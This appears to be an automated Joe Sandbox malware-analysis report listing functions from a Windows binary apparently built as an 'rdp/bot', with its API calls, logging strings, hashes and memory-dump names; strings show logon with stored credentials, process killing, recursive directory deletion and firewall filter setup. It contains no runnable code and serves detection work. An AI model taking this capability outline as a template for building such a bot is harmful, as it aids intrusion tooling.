Instruction ID: ef70e90701ab70f3044e1abfbcf711004bede3a51e2ad615221de2ad745c41e2
Opcode Fuzzy Hash: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
Instruction Fuzzy Hash: E0F05413B48203C3FD529A0976807B961619FAA765E890535ED5C8E6D1EE3D69878304

Function 00007FF66EBA4B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF66EBA4B30

Strings

fs_file_read, xrefs: 00007FF66EBA4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA4B6C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
Instruction ID: ef70e90701ab70f3044e1abfbcf711004bede3a51e2ad615221de2ad745c41e2
Opcode Fuzzy Hash: 9c65c8f2be4238fc5c6823cff5000f37c5fbfd6c0b50ac6ed5e1889bd0f98325
Instruction Fuzzy Hash: E0F05413B48203C3FD529A0976807B961619FAA765E890535ED5C8E6D1EE3D69878304

Non-executed Functions

Function 00007FF66EBA292E Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF66EBA29C0
strcat.MSVCRT ref: 00007FF66EBA2AFA
strlen.MSVCRT ref: 00007FF66EBA2B10
strlen.MSVCRT ref: 00007FF66EBA2B1B
strlen.MSVCRT ref: 00007FF66EBA2B4F
strcat.MSVCRT ref: 00007FF66EBA2B5F
strlen.MSVCRT ref: 00007FF66EBA2B9D
strlen.MSVCRT ref: 00007FF66EBA2BAA
strlen.MSVCRT ref: 00007FF66EBA2BD3
strcat.MSVCRT ref: 00007FF66EBA2BE5
LogonUserA.ADVAPI32 ref: 00007FF66EBA2C55
GetLastError.KERNEL32 ref: 00007FF66EBA2C63
CloseHandle.KERNEL32 ref: 00007FF66EBA2F27

Strings

[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FF66EBA2C8A
NULL, xrefs: 00007FF66EBA31B6, 00007FF66EBA31C2, 00007FF66EBA31CE, 00007FF66EBA31DA, 00007FF66EBA31E6, 00007FF66EBA31F2, 00007FF66EBA31FE, 00007FF66EBA320A, 00007FF66EBA3216
[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu), xrefs: 00007FF66EBA2F10
(usr == NULL) || (pwd != NULL), xrefs: 00007FF66EBA2ACA
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF66EBA2A5B, 00007FF66EBA2A8F, 00007FF66EBA2AC3
(pi != NULL), xrefs: 00007FF66EBA2A62
h, xrefs: 00007FF66EBA30F6
[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu), xrefs: 00007FF66EBA30B3
(app != NULL), xrefs: 00007FF66EBA2A96
process_create, xrefs: 00007FF66EBA2A29, 00007FF66EBA2A69, 00007FF66EBA2A9D, 00007FF66EBA2AD1, 00007FF66EBA2C83, 00007FF66EBA2E1C, 00007FF66EBA2F09, 00007FF66EBA2F78, 00007FF66EBA30AC, 00007FF66EBA319E
[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu), xrefs: 00007FF66EBA31A5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA2A70, 00007FF66EBA2AA4, 00007FF66EBA2AD8
[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu), xrefs: 00007FF66EBA2F7F
[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FF66EBA2E23
[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x), xrefs: 00007FF66EBA2A30

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strlen$strcat$CloseErrorHandleLastLogonUser
String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
API String ID: 1842180197-3127737957
Opcode ID: 53ec143df6af64bbed9861a0fc667b94bfec076aa910c4003055f79a7445760f
Instruction ID: 36a27e106f51ebcfd024290aa87e375d6edbd6e0ab6b8945ecfe6130600a2ba7
Opcode Fuzzy Hash: 53ec143df6af64bbed9861a0fc667b94bfec076aa910c4003055f79a7445760f
Instruction Fuzzy Hash: 2E1264A194C643C2FE708B0AE6843B962B4FB6E744F540132FA4E8F694DF3DE5859709

Function 00007FF66EBA3DB3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FF66EBA3DF9
strcpy.MSVCRT ref: 00007FF66EBA3E14
FindFirstFileA.KERNEL32 ref: 00007FF66EBA3EE7
GetLastError.KERNEL32 ref: 00007FF66EBA3F03
GetLastError.KERNEL32 ref: 00007FF66EBA3F32
FindClose.KERNEL32 ref: 00007FF66EBA3F50

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

Strings

(resume_handle != NULL), xrefs: 00007FF66EBA3EB9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA3E57, 00007FF66EBA3E8F, 00007FF66EBA3EC7
fs_dir_list, xrefs: 00007FF66EBA3E50, 00007FF66EBA3E88, 00007FF66EBA3EC0, 00007FF66EBA3F1D, 00007FF66EBA3F61
(name != NULL), xrefs: 00007FF66EBA3E81
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA3E42, 00007FF66EBA3E7A, 00007FF66EBA3EB2
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF66EBA3F68
(path != NULL), xrefs: 00007FF66EBA3E49
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF66EBA3F24

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-1535167640
Opcode ID: 4df82a89110796e5bc07bc0514147b914851caf7b0973821b63fcd9de12ae24f
Instruction ID: 7a1e1c9e2eeea5e24ace47f057b3160e6dd99463159cadfbdbfa6f950ca12df8
Opcode Fuzzy Hash: 4df82a89110796e5bc07bc0514147b914851caf7b0973821b63fcd9de12ae24f
Instruction Fuzzy Hash: 24614B21E5C553C7FE60671CA6883B92270EB3A354F540132F89ECF2D0DE6EA9499249

Function 00007FF66EBA1A19 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF66EBA1A46
LoadResource.KERNEL32 ref: 00007FF66EBA1A5E

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

GetLastError.KERNEL32 ref: 00007FF66EBA1B58
GetLastError.KERNEL32 ref: 00007FF66EBA1B8D
GetLastError.KERNEL32 ref: 00007FF66EBA1B92

Strings

module_get_version, xrefs: 00007FF66EBA1ADF, 00007FF66EBA1B18, 00007FF66EBA1B43, 00007FF66EBA1B66, 00007FF66EBA1B9B
(hnd != NULL), xrefs: 00007FF66EBA1B11
C:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FF66EBA1B0A, 00007FF66EBA1B35
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA1B1F, 00007FF66EBA1B4A
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FF66EBA1BA2
(out != NULL), xrefs: 00007FF66EBA1B3C
[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FF66EBA1AE6
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF66EBA1B6D

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-2019010457
Opcode ID: 4f6991ac9f89fd7611e1659217fb5fe61bd675e75ff2adad2c7ac8f6f62c38dc
Instruction ID: 50fbce0e2edab6b4a575a7075697011a1f473a83cac9885397032276abe2c9ea
Opcode Fuzzy Hash: 4f6991ac9f89fd7611e1659217fb5fe61bd675e75ff2adad2c7ac8f6f62c38dc
Instruction Fuzzy Hash: B2412AB1A08642CBEB90CF68E68056977B0FB2D754F440135FA5DCB698EE3CE944CB04

Function 00007FF66EBAFF1F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF66EBAFF2E
GetProcAddress.KERNEL32 ref: 00007FF66EBAFF45
LoadLibraryW.KERNEL32 ref: 00007FF66EBAFF53
GetProcAddress.KERNEL32 ref: 00007FF66EBAFF63

Strings

SystemFunction036, xrefs: 00007FF66EBAFF59
rand_s, xrefs: 00007FF66EBAFF3B
msvcrt.dll, xrefs: 00007FF66EBAFF27
advapi32.dll, xrefs: 00007FF66EBAFF4C

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
Instruction ID: 23d9c1a680d2348d828d17296a9b7d8f846f3540b2c40170a66acc8ccdcff69c
Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
Instruction Fuzzy Hash: EDF0FE30E5BA17D1ED05DB55FED00B42374BF2E780F440132E84D9A328EE6CA94AC309

Function 00007FF66EBA929A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF66EBA92B1
ntohl.WS2_32 ref: 00007FF66EBA92B9

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

Strings

[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx), xrefs: 00007FF66EBA9521
3L, xrefs: 00007FF66EBA9486
TL, xrefs: 00007FF66EBA92D6
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF66EBA9367
setup_ip4_filt, xrefs: 00007FF66EBA9360, 00007FF66EBA951A

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: fflushfwriteinet_addrntohl
String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
API String ID: 3255839625-58178811
Opcode ID: 54b0ca27f2cd3d416422a108330809e770685ec5bff1d9a2d2897b8d07f325aa
Instruction ID: 6811af505ae4070cbaa85d2d51a39ea337a5640801c3945b15e4bbdef1ffe88d
Opcode Fuzzy Hash: 54b0ca27f2cd3d416422a108330809e770685ec5bff1d9a2d2897b8d07f325aa
Instruction Fuzzy Hash: 8F517E3261CBC5C9E7718B28B4403DA76B5EB99780F444125E6CC8BB99EF3DC185CB44

Function 00007FF66EBA6FD5 Relevance: 1.5, APIs: 1, Instructions: 25timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF66EBA6FF0

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
Instruction ID: d722d52c10e909be06c5d869de25f84bbb47aea93fd7c876f1cfd4f1260907bb
Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
Instruction Fuzzy Hash: 88E022E272880583EF20C60DE0807BBA361CBAC384F504030F95DC7B68DE2CD9428B40

Function 00007FF66EBB0779 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 378ab548b62ab026256bcbecf8073dcd6dd962d7fa094b9cf604b5146a34c438
Instruction ID: e12e56e390701b08da0eaddf78755e8398b6a64fb1c28d00fc8622a2c4e4b460
Opcode Fuzzy Hash: 378ab548b62ab026256bcbecf8073dcd6dd962d7fa094b9cf604b5146a34c438
Instruction Fuzzy Hash: 4FA00213D9DE02D4E6000B41D9C16B06238E72F311F042431D0199A4658D6C9540851A

Function 00007FF66EBA212F Relevance: 66.9, APIs: 13, Strings: 25, Instructions: 417processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF66EBA2163
Process32First.KERNEL32 ref: 00007FF66EBA2197
GetLastError.KERNEL32 ref: 00007FF66EBA2227
GetLastError.KERNEL32 ref: 00007FF66EBA22FF
strcmp.MSVCRT ref: 00007FF66EBA24CA
OpenProcess.KERNEL32 ref: 00007FF66EBA24E2
TerminateProcess.KERNEL32 ref: 00007FF66EBA24FC
GetLastError.KERNEL32 ref: 00007FF66EBA250A
CloseHandle.KERNEL32 ref: 00007FF66EBA2895

Strings

~, xrefs: 00007FF66EBA260B
, xrefs: 00007FF66EBA253C
, xrefs: 00007FF66EBA232C
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF66EBA21BE
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF66EBA251C
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FF66EBA2239
P, xrefs: 00007FF66EBA22B8
(name != NULL) || (pid != 0), xrefs: 00007FF66EBA21C5
P, xrefs: 00007FF66EBA2439
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF66EBA2720
, xrefs: 00007FF66EBA2245
[I] (%s) -> Done(name=%s,pid=%lu), xrefs: 00007FF66EBA28B5
P, xrefs: 00007FF66EBA2395
[E] (%s) -> OpenProcess failed(gle=%lu), xrefs: 00007FF66EBA25B5
NULL, xrefs: 00007FF66EBA2916, 00007FF66EBA2922
process_kill, xrefs: 00007FF66EBA21CC, 00007FF66EBA21FE, 00007FF66EBA2232, 00007FF66EBA2319, 00007FF66EBA2515, 00007FF66EBA25AE, 00007FF66EBA2719, 00007FF66EBA28AE
~, xrefs: 00007FF66EBA2430
P, xrefs: 00007FF66EBA2614
|, xrefs: 00007FF66EBA21B6
~, xrefs: 00007FF66EBA22AF
~, xrefs: 00007FF66EBA238C
, xrefs: 00007FF66EBA25D5
[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FF66EBA2320
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA21D3
[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x), xrefs: 00007FF66EBA2205

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
API String ID: 3326156344-4160762685
Opcode ID: 9684c7817d2b89dd82b271affbb1874d8093c4edd663902d43bdccb5249f42f4
Instruction ID: a2dd7e33757fb1a931d742487c276f1d97de15398675aa6ba1c04e66c140615a
Opcode Fuzzy Hash: 9684c7817d2b89dd82b271affbb1874d8093c4edd663902d43bdccb5249f42f4
Instruction Fuzzy Hash: B1F1F750E8C603C7FE65569AAAC03791270EF3F755E240436FA0ECF2E2DD5DAD85920A

Function 00007FF66EBA4D81 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF66EBA4DA6
RemoveDirectoryA.KERNEL32 ref: 00007FF66EBA4DBE
GetLastError.KERNEL32 ref: 00007FF66EBA4DC8

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

strcpy.MSVCRT ref: 00007FF66EBA4E92
strlen.MSVCRT ref: 00007FF66EBA4E9A
strlen.MSVCRT ref: 00007FF66EBA4EB6
strlen.MSVCRT ref: 00007FF66EBA4EC7
strcpy.MSVCRT ref: 00007FF66EBA4EE1
strlen.MSVCRT ref: 00007FF66EBA4EE9
strlen.MSVCRT ref: 00007FF66EBA4F0B
strlen.MSVCRT ref: 00007FF66EBA4F1F
strcmp.MSVCRT ref: 00007FF66EBA4F61
strcmp.MSVCRT ref: 00007FF66EBA4F74
RemoveDirectoryA.KERNEL32 ref: 00007FF66EBA501D
GetLastError.KERNEL32 ref: 00007FF66EBA502B

Strings

[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF66EBA517B
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF66EBA5118
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FF66EBA4F94
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA4E11
*, xrefs: 00007FF66EBA4ECC
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF66EBA4DE6, 00007FF66EBA5049
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA4DFC
NULL, xrefs: 00007FF66EBA5165
(path != NULL), xrefs: 00007FF66EBA4E03
fs_dir_delete, xrefs: 00007FF66EBA4DDF, 00007FF66EBA4E0A, 00007FF66EBA4F8D, 00007FF66EBA5042, 00007FF66EBA5111, 00007FF66EBA5174

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
